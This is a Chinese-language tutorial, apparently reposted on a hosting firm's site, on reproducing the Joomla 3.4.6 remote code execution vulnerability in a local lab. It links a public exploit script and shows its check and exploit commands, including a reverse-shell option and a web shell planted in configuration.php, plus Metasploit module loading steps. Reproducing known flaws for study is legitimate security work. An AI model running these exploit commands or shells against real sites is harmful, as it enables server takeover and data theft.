RELATEED CONSULTING
相关咨询
选择下列产品马上在线沟通
服务时间:8:30-17:00
你可能遇到了下面的问题
关闭右侧工具栏

新闻中心

这里有您想知道的互联网营销解决方案
如何进行Joomla3.4.6远程代码执行漏洞复现

本篇文章给大家分享的是有关如何进行Joomla 3.4.6 远程代码执行漏洞复现,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

创新互联公司客户idc服务中心,提供成都棕树机房、成都服务器、成都主机托管、成都双线服务器等业务的一站式服务。通过各地的服务中心,我们向成都用户提供优质廉价的产品以及开放、透明、稳定、高性价比的服务,资深网络工程师在机房提供7*24小时标准级技术保障。

0x00 简介


Joomla是一套全球知名的内容管理系统。

Joomla是使用PHP语言加上MySQL数据库所开发的软件系统。

可以在Linux、Windows、MacOSX等各种不同的平台上执行。目前由Open Source Matters开源组织进行开发与支持。

0x01 漏洞概述


Alessandro Groppo @Hacktive Security于2019-10-02在exploit-db( https://www.exploit-db.com/exploits/47465)发布了Joomla命令执行的EXP,漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。

0x02 影响范围


3.0.0 <= Joomla <= 3.4.6

0x03 环境搭建


懒人搭建php环境当然是选择wamp/phpstudy啦

下载链接:

https://downloads.joomla.org/it/cms/joomla3/3-4-6 

下载解压后放入wamp/www/Joomla或者phpstudy/PHPTutorial/WWW/Joomla/目录下,访问http://127.0.0.1/Joomla/准备安装

安装流程如下:

如何进行Joomla 3.4.6 远程代码执行漏洞复现

如何进行Joomla 3.4.6 远程代码执行漏洞复现

默认root/空

如何进行Joomla 3.4.6 远程代码执行漏洞复现

如何进行Joomla 3.4.6 远程代码执行漏洞复现

如何进行Joomla 3.4.6 远程代码执行漏洞复现

至此,环境搭建完毕。

0x04 漏洞利用


下载漏洞利用脚本:

https://github.com/kiks7/rusty_joomla_rce

漏洞检测: 

python3 rusty_joomla_exploit.py -t http://127.0.0.1/Joomla/ -c

注意URL一定要以/结尾 /结尾 /结尾 (别问我为什么, 说多了都是泪…脚本里有url拼接)

如何进行Joomla 3.4.6 远程代码执行漏洞复现

漏洞利用: 

python3 rusty_joomla_exploit.py -t http://127.0.0.1/Joomla/ -e -l 127.0.0.1 -p 2333

(-e -l -p参数可以反弹shell, 本文并没有反弹成功, 但是可以看到马的密码)

如何进行Joomla 3.4.6 远程代码执行漏洞复现

一句话客户端连接

http://127.0.0.1/Joomla/configuration.php

由于贫道用的公司的办公电脑没有菜刀之类的工具简单截个hackbar返回的图:

如何进行Joomla 3.4.6 远程代码执行漏洞复现

BY THE WAY…

作者同时提供了msf下的EXP:

metasploit_rusty_joomla_rce.rb 

轻轻放入目录: 

/usr/share/metasploit-framework/modules/exploits/multi/php/

msfconsole -> reload_all -> search joomla_rce -> use xxxxx -> info

0x05 修复方式

更新至官网最新版本

以上就是如何进行Joomla 3.4.6 远程代码执行漏洞复现,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注创新互联行业资讯频道。


标题名称:如何进行Joomla3.4.6远程代码执行漏洞复现
URL链接:http://lswzjz.com/article/jpdise.html